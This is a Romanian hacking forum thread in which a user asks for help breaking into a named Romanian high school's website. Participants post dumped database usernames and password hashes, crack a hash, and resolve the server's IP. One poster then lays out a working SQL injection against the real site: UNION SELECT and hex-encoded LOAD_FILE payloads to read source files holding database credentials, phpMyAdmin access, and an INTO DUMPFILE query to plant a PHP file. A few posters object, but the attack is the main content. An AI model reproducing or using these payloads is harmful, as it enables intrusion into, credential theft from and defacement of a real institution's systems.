CYobY Posted December 11, 2011 Report Posted December 11, 2011 Sunt curios daca se poate sparge situl asta Grupul Scolar Industrial Stefan Procopiu Vaslui Quote
razer_krait Posted December 11, 2011 Report Posted December 11, 2011 (edited) Na ma, fa-te hacker Click.User:Password:root:013bf4713f16a303:pma:6ec995ca3d407454:Bun, acuma incepe si sparge hash-ul, si aici te blochezi. Edited December 11, 2011 by razer_krait 1 Quote
spider Posted December 11, 2011 Report Posted December 11, 2011 Sunt curios daca se poate sparge situl asta ai ramas repetent ? razbunarea e de obicei arma prostului si tu nu pari departe Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 am aflat utilizatori si parolele dar acum cum intru in control panel sau ceva de genu ?ps: poti afla ip-ul ? Quote
tdxev Posted December 11, 2011 Report Posted December 11, 2011 CYobY cati ani ai ? vad ca nu ai trecut pe la "Bine ai venit (aici te poti prezenta)". Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 am 18 ani, si sunt nub in ceea ce priveste chestii d'astea Quote
tdxev Posted December 11, 2011 Report Posted December 11, 2011 atunci scoate cativa verzisori de la saltea vorbeste cu cineva care se pricepe (de ex. razer_krait ca tot s-a apucat de treaba) explica-i ce vrei sa faci si gata.. Quote
Weedy92 Posted December 11, 2011 Report Posted December 11, 2011 am aflat utilizatori si parolele dar acum cum intru in control panel sau ceva de genu ?ps: poti afla ip-ul ?Cu ajutorul meu binenteles.. Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 imi poate spune cineva ? ajutati un biet incepator Quote
JOEE Posted December 11, 2011 Report Posted December 11, 2011 ps: poti afla ip-ul ? Resolved Grupul Scolar Industrial Stefan Procopiu Vaslui to 63.251.179.13 . Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 deci pana acum am aflatdeci am gasit useri si parolele cred ca hash-ul e astaCracking hash: e10adc3949ba59abbe56e057f20f883ePlain text of e10adc3949ba59abbe56e057f20f883e is 123456imi poti spune cum ma logez cu datele lor la find admins am gasit urmatorul linkXAMPP for Windows Version 1.5.3a | Security Section 1 Quote
TheWiner Posted December 11, 2011 Report Posted December 11, 2011 plm.. traba sa iti instalezi XAMPP ca sa iti mearga. Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 sigur trebuie sa instalez xampp ? poate ma pui sa il instalez degeaba Quote
Weedy92 Posted December 11, 2011 Report Posted December 11, 2011 sigur trebuie sa instalez xampp ? poate ma pui sa il instalez degeabaNimeni nu te pune sa faci nimic degeaba pe aici daca nu vrei nu il instala si gata Quote
aelius Posted December 11, 2011 Report Posted December 11, 2011 imi poate spune cineva ? ajutati un biet incepatorParca ai cere un colt de paine si o farfurie de ciorba. Sparge si tu site-uri tumefiate de panarane. Nu te uita la site-uri de scoli si educationale. E de rahat sa-ti bati joc de munca altora, fie ea facuta de ratati. Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 poate careva sa sparga hash-ul asta? 6ec995ca3d407454 Quote
totti93 Posted December 11, 2011 Report Posted December 11, 2011 (edited) Trebuie lucrat cu capul si obtii:http://stefanprocopiu.vaslui.rdsnet.ro/deface.phpMetoda (Sa nu fie secreta):Metoda:SQL InjectionAflam path-ul catre MySQLhttp://stefanprocopiu.vaslui.rdsnet.ro/articol.php?idarticol=70+and+false+union+all+select+1,2,3,4,5,@@basedir,7--=>\xampp\mysql\Fiind instalat XAMPP inseamna ca sistemul de operare este Windows (Asta se vede si din bannerul serverului Apache/2.2.3 (Win32))... XAMPP isi tine fisierele www in "\xampp\htdocs".Deci cu un simplu LOAD_FILE() putem citi fisierele. Dar care e drive-ul? Incercam cu C: (care va fi chiar drive-ul corect)Avem fisierul "articol.php" ("c:\xampp\htdocs\articol.php"). Aplicam functia LOAD_FILE() (Hex, deoarece este filtrat apostroful):http://stefanprocopiu.vaslui.rdsnet.ro/articol.php?idarticol=70+and+false+union+all+select+1,2,3,4,5,load_file%280x633a5c78616d70705c6874646f63735c61727469636f6c2e706870%29,7--Putem obeserva ca returneaza urmatorul cod (segment de cod):include ("continut_articol.php");Sa citim continutul acestui fisier:http://stefanprocopiu.vaslui.rdsnet.ro/articol.php?idarticol=70+and+false+union+all+select+1,2,3,4,5,load_file%280x633a5c78616d70705c6874646f63735c636f6e74696e75745f61727469636f6c2e706870%29,7--Ca rezultat vom obtine:$msql = @mysql_connect("localhost" , "XXXXXXXXXX", "XXXXXXXXX") or die("Nu s-a realizat conectarea la baza de date...");$baza = @mysql_select_db("lsp") or die("Nu exista baza de date...") ;Luam userul si parola de aici si accesam PhpMyAdmin:http://stefanprocopiu.vaslui.rdsnet.ro/phpmyadmin/Cu o simpla interogare SQL vom scrie in fisiere:SELECT '<?php ?>' INTO DUMPFILE 'C:\\XAMPP\\HTDOCS\\OUT.PHP' Edited December 11, 2011 by totti93 Pentru dezvaluirea metodei... Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 Sa citim continutul acestui fisier:Grupul Scolar Industrial Stefan Procopiu VasluiCa rezultat vom obtine:Code:$msql = @mysql_connect("localhost" , "XXXXXXXXXX", "XXXXXXXXX") or die("Nu s-a realizat conectarea la baza de date...");$baza = @mysql_select_db("lsp") or die("Nu exista baza de date...") ;mie nu imi arata rezultatul care iti arata tie Quote
TheWiner Posted December 11, 2011 Report Posted December 11, 2011 Acuma vrei si mura in gura, dupaia ca sa te lauzi la prieteni tai ca ai fost tu. Quote
Weedy92 Posted December 11, 2011 Report Posted December 11, 2011 Sa citim continutul acestui fisier:Grupul Scolar Industrial Stefan Procopiu VasluiCa rezultat vom obtine:Code:$msql = @mysql_connect("localhost" , "XXXXXXXXXX", "XXXXXXXXX") or die("Nu s-a realizat conectarea la baza de date...");$baza = @mysql_select_db("lsp") or die("Nu exista baza de date...") ;mie nu imi arata rezultatul care iti arata tieEsti Bolovan , Mura in gura nu iti da nimeni Quote
CYobY Posted December 11, 2011 Author Report Posted December 11, 2011 oricum nu vreau sa il stric Quote
BogdanNBV Posted December 11, 2011 Report Posted December 11, 2011 @CYobY prietene lasa-te, ai primit mura-n gura pana acum si tot nu est in stare, apuca-te de alte lucruri. Quote
totti93 Posted December 11, 2011 Report Posted December 11, 2011 @CYobY Eu ti-am explicat teoretic ce se intampla, pentru ca stiu ca vrei sa dai deface la site, gen "Hacked by CYobY". Adica eu fac atacul, si tu doar sa-ti pui amprenta pe ea?In plus, nu va inteleg... Care e rostul unui deface? Mai bine iau root, sau macar shell, si imi rulez acolo scripturile, decat sa-mi folosesc procesorul. Un deface la Cancan mai mege, pentru ca merita... Quote
Paul4games Posted December 11, 2011 Report Posted December 11, 2011 Eu nu inteleg de ce dracu va pierdeti timpul, deja ma si enerveaza asta......dute frate si invata bazele prima oara si dupa aceea sparge tu site-uri, de ce dracu nu e postul asta la penale deja? Quote
Park Posted December 12, 2011 Report Posted December 12, 2011 Bai sa-mi bag pula. Site-ul asta e facut doar ca sa fie si sa mai aduca aminte elevilor "silitori" de la Procopiu despre evenimentele scolare si extrascolare. Nu stiu de ce va frecati pulile unii altora cu SQL injection si ii prezentati unui pusti de clasa a 9-a cum sa obtina acces la site. Maine stiu toti elevii ca Cyoby a spart site-ul liceului si e mare hacker. Quote
